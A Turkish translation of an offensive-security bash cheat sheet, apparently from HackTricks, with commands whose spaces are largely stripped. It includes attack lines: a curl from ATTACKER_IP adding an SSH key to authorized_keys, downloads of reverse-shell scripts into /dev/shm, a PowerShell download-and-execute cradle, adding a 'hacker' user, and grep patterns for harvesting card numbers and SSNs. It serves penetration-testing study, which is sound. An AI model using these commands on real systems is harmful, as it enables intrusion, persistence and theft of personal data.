Hacking püf noktalarını paylaşarak PR'ler göndererekHackTricks ve HackTricks Cloud github depolarına katkıda bulunun.
Ortak Bash
#Exfiltration using Base64base64-w0file#Get HexDump without new linesxxd-pboot12.bin|tr-d'\n'#Add public key to authorized keyscurlhttps://ATTACKER_IP/.ssh/id_rsa.pub>>~/.ssh/authorized_keys#Echo without new line and Hexecho-n-e#Countwc-l<file>#Lineswc-c#Chars#Sortsort-nr#Sort by number and then reversecatfile|sort|uniq#Sort and delete duplicates#Replace in filesed-i's/OLD/NEW/g'path/file#Replace string inside a file#Download in RAMwget10.10.14.14:8000/tcp_pty_backconnect.py-O/dev/shm/.rev.pywget10.10.14.14:8000/tcp_pty_backconnect.py-P/dev/shmcurl10.10.14.14:8000/shell.py-o/dev/shm/shell.py#Files used by network processeslsof#Open files belonging to any processlsof-p3#Open files used by the processlsof-i#Files used by networks processeslsof-i4#Files used by network IPv4 processeslsof-i6#Files used by network IPv6 processeslsof-i4-a-p1234#List all open IPV4 network files in use by the process 1234lsof+D/lib#Processes using files inside the indicated dirlsof-i:80#Files uses by networks processesfuser-nvtcp80#Decompresstar-xvzf/path/to/yourfile.tgztar-xvjf/path/to/yourfile.tbzbzip2-d/path/to/yourfile.bz2tarjxffile.tar.bz2gunzip/path/to/yourfile.gzunzipfile.zip7z-xfile.7zsudoapt-getinstallxz-utils; unxzfile.xz#Add new useruseradd-p'openssl passwd -1 <Password>'hacker#Clipboardxclip-selc<catfile.txt#HTTP serverspython-mSimpleHTTPServer80python3-mhttp.serverruby-rwebrick-e"WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"php-S $ip:80#Curl#json datacurl --header "Content-Type: application/json" --request POST --data '{"password":"password", "username":"admin"}' http://host:3000/endpoint
#Auth via JWTcurl-XGET-H'Authorization: Bearer <JWT>'http://host:3000/endpoint#Send EmailsendEmail -t to@email.com -f from@email.com -s 192.168.8.131 -u Subject -a file.pdf #You will be prompted for the content
#DD copy hex bin file without first X (28) bytesddif=file.binbs=28skip=1of=blob#Mount .vhd files (virtual hard drive)sudoapt-getinstalllibguestfs-toolsguestmount--addNAME.vhd--inspector--ro/mnt/vhd#For read-only, create first /mnt/vhd# ssh-keyscan, help to find if 2 ssh ports are from the same host comparing keysssh-keyscan10.10.10.101# Opensslopenssls_client-connect10.10.10.127:443#Get the certificate from a serveropensslx509-inca.cert.pem-text#Read certificateopensslgenrsa-outnewuser.key2048#Create new RSA2048 keyopenssl req -new -key newuser.key -out newuser.csr #Generate certificate from a private key. Recommended to set the "Organizatoin Name"(Fortune) and the "Common Name" (newuser@fortune.htb)
opensslreq-x509-newkeyrsa:4096-keyoutkey.pem-outcert.pem-days365-nodes#Create certificateopenssl x509 -req -in newuser.csr -CA intermediate.cert.pem -CAkey intermediate.key.pem -CAcreateserial -out newuser.pem -days 1024 -sha256 #Create a signed certificate
openssl pkcs12 -export -out newuser.pfx -inkey newuser.key -in newuser.pem #Create from the signed certificate the pkcs12 certificate format (firefox)
# If you only needs to create a client certificate from a Ca certificate and the CA key, you can do it using:opensslpkcs12-export-inca.cert.pem-inkeyca.key.pem-outclient.p12# Decrypt ssh keyopensslrsa-inkey.ssh.enc-outkey.ssh#Decryptopensslenc-aes256-k<KEY>-d-inbackup.tgz.enc-outb.tgz#Count number of instructions executed by a program, need a host based linux (not working in VM)perfstat-x,-einstructions:u"ls"#Find trick for HTB, find files from 2018-12-12 to 2018-12-14find / -newermt 2018-12-12 ! -newermt 2018-12-14 -type f -readable -not -path "/proc/*" -not -path "/sys/*" -ls 2>/dev/null
#Reconfigure timezonesudodpkg-reconfiguretzdata#Search from which package is a binaryapt-filesearch/usr/bin/file#Needed: apt-get install apt-file#Protobuf decode https://www.ezequiel.tech/2020/08/leaking-google-cloud-projects.htmlecho"CIKUmMesGw=="|base64-d|protoc--decode_raw#Set not removable bitsudochattr+ifile.txtsudochattr-ifile.txt#Remove the bit so you can delete it# List files inside zip7zlfile.zip
Trickest kullanarak dünyanın en gelişmiş topluluk araçlarıyla desteklenen iş akışlarını otomatikleştirin.
Bugün Erişim Edinin:
Windows için Bash
#Base64 for Windowsecho -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')" | iconv --to-code UTF-16LE | base64 -w0
#Exe compressionupx-9nc.exe#Exe2batwineexe2bat.exenc.exenc.txt#Compile Windows python exploit to exepipinstallpyinstallerwget-Oexploit.pyhttp://www.exploit-db.com/download/31853pythonpyinstaller.py--onefileexploit.py#Compile for windows#sudo apt-get install gcc-mingw-w64-i686i686-mingw32msvc-gcc-oexecutableuseradd.c
Greps
Grep, metin dosyalarında belirli bir deseni aramak için kullanılan güçlü bir araçtır. Grep komutu, bir dosyadaki belirli bir metin desenini aramak için kullanılır.
Örnek Kullanım:
grep"pattern"file.txt
#Extract emails from filegrep-E-o"\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b"file.txt#Extract valid IP addressesgrep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" file.txt
#Extract passwordsgrep-i"pwd\|passw"file.txt#Extract usersgrep-i"user\|invalid\|authentication\|login"file.txt# Extract hashes#Extract md5 hashes ({32}), sha1 ({40}), sha256({64}), sha512({128})egrep-oE'(^|[^a-fA-F0-9])[a-fA-F0-9]{32}([^a-fA-F0-9]|$)'*.txt|egrep-o'[a-fA-F0-9]{32}'>md5-hashes.txt#Extract valid MySQL-Old hashesgrep-e"[0-7][0-9a-f]{7}[0-7][0-9a-f]{7}"*.txt>mysql-old-hashes.txt#Extract blowfish hashesgrep-e"$2a\$\08\$(.){75}"*.txt>blowfish-hashes.txt#Extract Joomla hashesegrep-o"([0-9a-zA-Z]{32}):(w{16,32})"*.txt>joomla.txt#Extract VBulletin hashesegrep-o"([0-9a-zA-Z]{32}):(S{3,32})"*.txt>vbulletin.txt#Extraxt phpBB3-MD5egrep-o'$H$S{31}'*.txt>phpBB3-md5.txt#Extract Wordpress-MD5egrep-o'$P$S{31}'*.txt>wordpress-md5.txt#Extract Drupal 7egrep-o'$S$S{52}'*.txt>drupal-7.txt#Extract old Unix-md5egrep-o'$1$w{8}S{22}'*.txt>md5-unix-old.txt#Extract md5-apr1egrep-o'$apr1$w{8}S{22}'*.txt>md5-apr1.txt#Extract sha512crypt, SHA512(Unix)egrep-o'$6$w{8}S{86}'*.txt>sha512crypt.txt#Extract e-mails from text filesgrep-E-o"\b[a-zA-Z0-9.#?$*_-]+@[a-zA-Z0-9.#?$*_-]+.[a-zA-Z0-9.-]+\b"*.txt>e-mails.txt#Extract HTTP URLs from text filesgrephttp|grep-shoP'http.*?[" >]'*.txt>http-urls.txt#For extracting HTTPS, FTP and other URL format usegrep-E'(((https|ftp|gopher)|mailto)[.:][^ >" ]*|www.[-a-z0-9.]+)[^ .,; >">):]'*.txt>urls.txt#Note: if grep returns "Binary file (standard input) matches" use the following approaches # tr '[\000-\011\013-\037177-377]' '.' < *.log | grep -E "Your_Regex" OR # cat -v *.log | egrep -o "Your_Regex"
#Extract Floating point numbersgrep-E-o"^[-+]?[0-9]*.?[0-9]+([eE][-+]?[0-9]+)?$"*.txt>floats.txt# Extract credit card data#Visagrep-E-o"4[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}"*.txt>visa.txt#MasterCardgrep-E-o"5[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}"*.txt>mastercard.txt#American Expressgrep-E-o"\b3[47][0-9]{13}\b"*.txt>american-express.txt#Diners Clubgrep-E-o"\b3(?:0[0-5]|[68][0-9])[0-9]{11}\b"*.txt>diners.txt#Discovergrep-E-o"6011[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}"*.txt>discover.txt#JCBgrep-E-o"\b(?:2131|1800|35d{3})d{11}\b"*.txt>jcb.txt#AMEXgrep-E-o"3[47][0-9]{2}[ -]?[0-9]{6}[ -]?[0-9]{5}"*.txt>amex.txt# Extract IDs#Extract Social Security Number (SSN)grep-E-o"[0-9]{3}[ -]?[0-9]{2}[ -]?[0-9]{4}"*.txt>ssn.txt#Extract Indiana Driver License Numbergrep-E-o"[0-9]{4}[ -]?[0-9]{2}[ -]?[0-9]{4}"*.txt>indiana-dln.txt#Extract US Passport Cardsgrep-E-o"C0[0-9]{7}"*.txt>us-pass-card.txt#Extract US Passport Numbergrep-E-o"[23][0-9]{8}"*.txt>us-pass-num.txt#Extract US Phone Numberssgrep-Po'd{3}[s-_]?d{3}[s-_]?d{4}'*.txt>us-phones.txt#Extract ISBN Numbersegrep -a -o "\bISBN(?:-1[03])?:? (?=[0-9X]{10}$|(?=(?:[0-9]+[- ]){3})[- 0-9X]{13}$|97[89][0-9]{10}$|(?=(?:[0-9]+[- ]){4})[- 0-9]{17}$)(?:97[89][- ]?)?[0-9]{1,5}[- ]?[0-9]+[- ]?[0-9]+[- ]?[0-9X]\b" *.txt > isbn.txt
Bul
# Find SUID set files.find/-perm/u=s-ls2>/dev/null# Find SGID set files.find/-perm/g=s-ls2>/dev/null# Found Readable directory and sort by time. (depth = 4)find / -type d -maxdepth 4 -readable -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r
# Found Writable directory and sort by time. (depth = 10)find / -type d -maxdepth 10 -writable -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r
# Or Found Own by Current User and sort by time. (depth = 10)find / -maxdepth 10 -user $(id -u) -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r
# Or Found Own by Current Group ID and Sort by time. (depth = 10)find / -maxdepth 10 -group $(id -g) -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r
# Found Newer files and sort by time. (depth = 5)find / -maxdepth 5 -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r | less
# Found Newer files only and sort by time. (depth = 5)find / -maxdepth 5 -type f -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r | less
# Found Newer directory only and sort by time. (depth = 5)find / -maxdepth 5 -type d -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r | less
Nmap arama yardımı
#Nmap scripts ((default or version) and smb))nmap--script-help"(default or version) and *smb*"locate-r'\.nse$'|xargsgrepcategories|grep'default\|version\|safe'|grepsmbnmap--script-help"(default or version) and smb)"
Bash
Bash, Bourne Again Shell'in kısaltmasıdır ve Linux sistemlerinde en yaygın kullanılan kabuk (shell) programıdır. Bash, komutları çalıştırmak, betik dosyalarını yönetmek ve sistemle etkileşimde bulunmak için kullanılır. Bash'in güçlü bir betikleme diline sahip olması ve geniş bir komut yelpazesine sahip olması, sistem yöneticileri ve güvenlik uzmanları arasında popüler olmasını sağlar.
#All bytes inside a file (except 0x20 and 0x00)for j in $((for i in {0..9}{0..9} {0..9}{a..f} {a..f}{0..9} {a..f}{a..f}; do echo $i; done ) | sort | grep -v "20\|00"); do echo -n -e "\x$j" >> bytes; done
Iptables
Iptables
#Delete curent rules and chainsiptables--flushiptables--delete-chain#allow loopbackiptables-AINPUT-ilo-jACCEPTiptables-AOUTPUT-olo-jACCEPT#drop ICMPiptables-AINPUT-picmp-micmp--icmp-typeany-jDROPiptables-AOUTPUT-picmp-jDROP#allow established connectionsiptables-AINPUT-mstate--stateRELATED,ESTABLISHED-jACCEPT#allow ssh, http, https, dnsiptables-AINPUT-s10.10.10.10/24-ptcp-mtcp--dport22-jACCEPTiptables-AINPUT-ptcp-mstate--stateNEW-mtcp--dport80-jACCEPTiptables-AINPUT-ptcp-mstate--stateNEW-mtcp--dport443-jACCEPTiptables-AINPUT-pudp-mudp--sport53-jACCEPTiptables-AINPUT-ptcp-mtcp--sport53-jACCEPTiptables-AOUTPUT-pudp-mudp--dport53-jACCEPTiptables-AOUTPUT-ptcp-mtcp--dport53-jACCEPT#default policiesiptables-PINPUTDROPiptables-PFORWARDACCEPTiptables-POUTPUTACCEPT
Hacking püf noktalarını paylaşarak PR göndererekHackTricks ve HackTricks Cloud github depolarına katkıda bulunun.
Trickest kullanarak dünyanın en gelişmiş topluluk araçları tarafından desteklenen iş akışlarını kolayca oluşturun ve otomatikleştirin.
Bugün Erişim Alın: